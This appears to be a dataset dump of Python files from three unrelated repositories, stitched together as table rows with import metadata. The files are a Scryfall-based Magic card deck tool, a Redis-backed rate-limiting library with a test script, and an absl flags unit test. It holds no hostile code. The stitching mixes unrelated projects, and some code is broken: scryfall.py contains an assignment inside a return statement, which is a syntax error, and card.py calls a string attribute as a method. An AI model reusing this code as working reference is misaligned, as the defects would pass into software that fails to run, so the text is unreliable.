| {"/fliplib/deck.py": ["/fliplib/scryfall.py", "/fliplib/card.py"], "/flipper2.py": ["/fliplib/parser.py"], "/fliplib/parser.py": ["/fliplib/deck.py", "/fliplib/scryfall.py"], "/fliplib/card.py": ["/fliplib/scryfall.py"]} |
50,054 | JarLoz/flipper2 | refs/heads/master | /fliplib/card.py | import os
from .scryfall import getApi
class Card:
def __init__(self, cardname):
self.name = cardname
self.selectedPrinting = None
self.printings = None
self.cardId = None
def imageName(self, scryId = None):
if (scryId == None):
scryId = self.selectedPrinting
imageName = 'imageCache/front_' + scryId + '.jpg'
if (not os.path.isfile(imageName)):
# Image not downloaded.
api = getApi()
url = self.printings[scryId]['image_uris']['normal']
api.downloadImage(url, imageName)
return imageName
def getTTSCardObject(self):
return {
'Name':'Card',
'Nickname':self.name(),
'CardID':self.cardId,
'Transform':{
'posX':2.5,
'posY':2.5,
'posZ':3.5,
'rotX':0,
'rotY':180,
'rotZ':180,
'scaleX':1,
'scaleY':1,
'scaleZ':1
}
}
def createCard(cardname, cardId):
api = getApi()
scryfallData = api.findCard(cardname)
card = Card(cardname)
card.cardId = cardId
card.selectedPrinting = scryfallData['id']
if ('prints_search_uri' in scryfallData.keys()):
printings = api.findPrintings(scryfallData['oracle_id'])
else:
printings = {scryfallData['id'] : scryfallData}
card.printings = printings
return card
| {"/fliplib/deck.py": ["/fliplib/scryfall.py", "/fliplib/card.py"], "/flipper2.py": ["/fliplib/parser.py"], "/fliplib/parser.py": ["/fliplib/deck.py", "/fliplib/scryfall.py"], "/fliplib/card.py": ["/fliplib/scryfall.py"]} |
50,055 | JarLoz/flipper2 | refs/heads/master | /fliplib/deckimage.py | class DeckImage:
def __init__(self, index, url):
self.index = index
self.faceUrl = url
self.backUrl = 'https://i.imgur.com/P7qYTcI.png'
self.uniqueBack = False
def getCustomDeckObject(self):
return {'NumWidth':10,'NumHeight':7,'FaceUrl':self.faceUrl,'BackUrl':self.backUrl,'UniqueBack':self.uniqueBack}
| {"/fliplib/deck.py": ["/fliplib/scryfall.py", "/fliplib/card.py"], "/flipper2.py": ["/fliplib/parser.py"], "/fliplib/parser.py": ["/fliplib/deck.py", "/fliplib/scryfall.py"], "/fliplib/card.py": ["/fliplib/scryfall.py"]} |
50,056 | JarLoz/flipper2 | refs/heads/master | /fliplib/scryfall.py | import requests
import shutil
from time import sleep
_api = None
class Scryfall:
def __init__(self):
self.nameCache = {}
self.printCache = {}
self.apiUrl = "https://api.scryfall.com"
self.namedEndpoint = self.apiUrl + '/cards/named'
self.searchEndpoint = self.apiUrl + '/cards/search'
def findCard(self, cardname):
if (not cardname in self.nameCache.keys()):
response = requests.get(self.namedEndpoint,{'exact':cardname})
sleep(0.1) # Let's be nice with scryfall's API.
if (response.status_code == 200):
self.nameCache[cardname] = response.json()
else:
raise ApiError("Card not found!")
return self.nameCache[cardname]
def findPrintings(self, oracleId):
if (not oracleId in self.printCache.keys()):
response = requests.get(self.searchEndpoint,{'order':'released','q':'oracleid:'+oracleId,'unique':'prints'})
sleep(0.1) # It's important to be nice.
if (response.status_code == 200):
printingsResponse = response.json()
printings = {}
for printing in printingsResponse['data']:
printings[printing['id']] = printing
self.printCache[oracleId] = printings
else:
raise ApiError("Printings not found!")
return self.printCache[oracleId] = printings
def downloadImage(self, url, imageName):
response = requests.get(url, stream=True)
with open(imageName, "wb") as outfile:
shutil.copyfileobj(response.raw, outfile)
del response
sleep(0.1) # Still being very nice with scryfall.
return True
class ApiError(Exception):
def __init__(self, message):
self.message = message
def getApi():
global _api
if (_api == None):
_api = Scryfall()
return _api
| {"/fliplib/deck.py": ["/fliplib/scryfall.py", "/fliplib/card.py"], "/flipper2.py": ["/fliplib/parser.py"], "/fliplib/parser.py": ["/fliplib/deck.py", "/fliplib/scryfall.py"], "/fliplib/card.py": ["/fliplib/scryfall.py"]} |
50,057 | hou-rong/ControlSpeed | refs/heads/master | /test.py | # coding:utf-8
import time
import redis
from controlspeed import ControlSpeed
from controlspeed import ControlSpeedNetwork
redis_conn = redis.StrictRedis()
key = 'hourong'
@ControlSpeedNetwork(redis_conn, key, max_calls=10, period=3.0)
def do_something(args):
print(args)
time.sleep(0.1)
for i in range(20):
do_something(i)
@ControlSpeed(max_calls=10, period=3.0)
def do_something(args):
print(args)
time.sleep(0.1)
for i in range(20):
do_something(i)
from controlspeed import ControlSpeed
rate = ControlSpeed(max_calls=10, period=3.0)
for i in range(15):
with rate:
print(i)
def limited(until):
duration = int(round(until))
print('Speed limited, sleeping for %d seconds' % duration)
for i in range(20):
print(i)
rate = ControlSpeed(max_calls=2, period=3, callback=limited)
for i in range(3):
with rate:
print(i)
from controlspeed import SpeedSetter
speed_setter = SpeedSetter(redis_conn, key)
speed_setter.max_calls = 2
speed_setter.period = 2
@ControlSpeedNetwork(redis_conn, key, max_calls=10, period=3.0, dynamic=True)
def do_something(args):
print(args)
time.sleep(0.1)
for i in range(40):
if i == 14:
speed_setter.max_calls = 8
do_something(i)
| {"/test.py": ["/controlspeed/__init__.py"]} |
50,058 | hou-rong/ControlSpeed | refs/heads/master | /controlspeed/__init__.py | # conding:utf-8
import collections
import functools
import threading
import time
import pickle
from controlspeed.local_mutex import LocalMutex, LockError
class ControlSpeed(object):
def __init__(self, multi=None, max_calls=0, period=1.0, callback=None):
if period <= 0:
raise ValueError('Speed limiting period must be > 0')
if max_calls <= 0:
raise ValueError('Speed limiting number of calls must be > 0')
self.multi = multi
if self.multi:
self.filename = 'tmp.file'
self.lock = 'lock.file'
self.calls = collections.deque()
self.period = period
self.max_calls = max_calls
self.callback = callback
def __call__(self, f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
with self:
return f(*args, **kwargs)
return wrapped
def __enter__(self):
self.judge_load()
if len(self.calls) >= self.max_calls:
last = self._time_span
if last >= self.period:
until = 0
else:
until = self.period - last
if self.callback:
t = threading.Thread(target=self.callback, args=(until,))
t.daemon = True
t.start()
time.sleep(until)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.calls.append(time.time())
self.judge_dump()
while len(self.calls) > self.max_calls:
self.calls.popleft()
self.judge_dump()
@property
def _time_span(self):
if self.multi:
self.load()
return self.calls[-1] - self.calls[0]
# will add more mode, threading
def judge_dump(self):
if self.multi:
self.dump()
def judge_load(self):
if self.multi:
self.load()
def dump(self):
with LocalMutex(self.lock, wait=True):
pickle.dump(self.calls, open(self.filename, "w"))
def load(self):
with LocalMutex(self.lock, wait=True):
res = pickle.load(open(self.filename, "r"))
self.calls = res
class ControlSpeedNetwork(object):
def __init__(self, redis_conn, key, max_calls=0, period=1.0, callback=None, dynamic=False):
if period <= 0:
raise ValueError('Speed limiting period must be > 0')
if max_calls <= 0:
raise ValueError('Speed limiting number of calls must be > 0')
self.mq = MQ(redis_conn, key)
self.callback = callback
self.dynamic = dynamic
self.max_calls_setting = max_calls
self.period_setting = period
def __call__(self, f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
with self:
return f(*args, **kwargs)
return wrapped
def __enter__(self):
if self.mq.llen() >= self.max_calls:
last = self._time_span
if last >= self.period:
until = 0
else:
until = self.period - last
if self.callback:
t = threading.Thread(target=self.callback, args=(until,))
t.daemon = True
t.start()
time.sleep(until)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.mq.rpush(time.time())
while self.mq.llen() > self.max_calls:
self.mq.lpop()
@property
def _time_span(self):
return self.mq.lrange(-1) - self.mq.lrange(0)
@property
def _last_point(self):
return time.time() - self.mq.lrange(-1)
@property
def max_calls(self):
if self.dynamic:
return self.mq.max_calls
else:
return self.max_calls_setting
@property
def period(self):
if self.dynamic:
return self.mq.period
else:
return self.period_setting
class MQ(object):
def __init__(self, redis_conn, key):
self.redis_conn = redis_conn
self.key = key
def llen(self):
return self.redis_conn.llen(self.key)
def rpush(self, item):
return self.redis_conn.rpush(self.key, item)
def lpop(self):
return self.redis_conn.lpop(self.key)
def lrange(self, offset):
return float(self.redis_conn.lrange(self.key, offset, offset)[0])
@property
def max_calls(self):
return float(self.redis_conn.get(self.key + '-max-calls') or -1.0)
@max_calls.setter
def max_calls(self, value):
self.redis_conn.set(self.key + '-max-calls', value)
@property
def period(self):
return float(self.redis_conn.get(self.key + '-period') or -1.0)
@period.setter
def period(self, value):
self.redis_conn.set(self.key + '-period', value)
class SpeedSetter(MQ):
pass
| {"/test.py": ["/controlspeed/__init__.py"]} |
50,059 | corypaik/fancyflags | refs/heads/master | /fancyflags/_flags_test.py | # Copyright 2021 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for fancyflags._flags."""
from absl import flags
from absl.testing import absltest
from fancyflags import _flags
class FlagsTest(absltest.TestCase):
def test_update_shared_dict(self):
# Tests that the shared dict is updated when the flag value is updated.
shared_dict = {'a': {'b': 'value'}}
namespace = ('a', 'b')
flag_values = flags.FlagValues()
flags.DEFINE_flag(
_flags.ItemFlag(
shared_dict,
namespace,
parser=flags.ArgumentParser(),
serializer=flags.ArgumentSerializer(),
name='a.b',
default='bar',
help_string='help string'),
flag_values=flag_values)
flag_values['a.b'].value = 'new_value'
with self.subTest(name='setter'):
self.assertEqual(shared_dict, {'a': {'b': 'new_value'}})
flag_values(('./program', '--a.b=override'))
with self.subTest(name='override_parse'):
self.assertEqual(shared_dict, {'a': {'b': 'override'}})
def test_update_shared_dict_multi(self):
# Tests that the shared dict is updated when the flag value is updated.
shared_dict = {'a': {'b': ['value']}}
namespace = ('a', 'b')
flag_values = flags.FlagValues()
flags.DEFINE_flag(
_flags.MultiItemFlag(
shared_dict,
namespace,
parser=flags.ArgumentParser(),
serializer=flags.ArgumentSerializer(),
name='a.b',
default=['foo', 'bar'],
help_string='help string'),
flag_values=flag_values)
flag_values['a.b'].value = ['new', 'value']
with self.subTest(name='setter'):
self.assertEqual(shared_dict, {'a': {'b': ['new', 'value']}})
flag_values(('./program', '--a.b=override1', '--a.b=override2'))
with self.subTest(name='override_parse'):
self.assertEqual(shared_dict, {'a': {'b': ['override1', 'override2']}})
if __name__ == '__main__':
absltest.main()
| {"/fancyflags/_flags_test.py": ["/fancyflags/__init__.py"], "/fancyflags/examples/example_module.py": ["/fancyflags/__init__.py"], "/fancyflags/_auto.py": ["/fancyflags/__init__.py"], "/fancyflags/_define_auto_test.py": ["/fancyflags/__init__.py"], "/fancyflags/_define_auto.py": ["/fancyflags/__init__.py"], "/fancyflags/examples/override_test.py": ["/fancyflags/__init__.py"], "/fancyflags/_auto_test.py": ["/fancyflags/__init__.py"], "/fancyflags/_flagsaver_test.py": ["/fancyflags/__init__.py"], "/fancyflags/_definitions_test.py": ["/fancyflags/__init__.py"], "/fancyflags/_argument_parsers_test.py": ["/fancyflags/__init__.py"], "/fancyflags/_definitions.py": ["/fancyflags/__init__.py"]} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.